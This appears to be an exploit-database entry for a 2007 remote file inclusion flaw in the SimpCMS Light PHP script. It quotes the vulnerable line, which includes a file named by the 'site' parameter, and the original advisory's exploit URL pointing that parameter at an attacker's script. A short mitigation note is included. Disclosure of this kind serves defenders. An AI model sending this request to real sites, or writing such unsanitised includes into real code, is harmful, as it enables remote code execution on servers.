header-logo
Suggest Exploit
vendor:
SimpCMS Light
by:
Dr.RoVeR (Arab48 Hacker)
7.5
CVSS
HIGH
Arbitrary File Inclusion
98
CWE
Product Name: SimpCMS Light
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

SimpCMS Light Arbitrary File Inclusion Vulnerability

The SimpCMS Light script is vulnerable to an arbitrary file inclusion vulnerability. The bug file 'index.php' contains the vulnerable code on line 31, where it includes the file specified by the 'site' parameter. An attacker can exploit this vulnerability by supplying a malicious script as the 'site' parameter, leading to arbitrary file inclusion.

Mitigation:

To mitigate this vulnerability, it is recommended to apply a patch or upgrade to a newer version of the SimpCMS Light script. Additionally, input validation and sanitization should be implemented to prevent arbitrary file inclusion attacks.
Source

Exploit-DB raw data:

Bug Found By Dr.RoVeR -->Arab48 Hacker

Contact: Dr.RoVeR@HackerMail.CoM
---

Script: SimpCMS Light

Download: http://www.simpcms.com/light/normal/simp-cms-light.zip

--

Bug File: index.php

Bug code in line 31:
include $site.".php";

--

Exploit:
http://site.com/[path]/index.php?site=[EvilScript]

# milw0rm.com [2007-04-10]

Navigation

Suggest Exploit

Services By CQR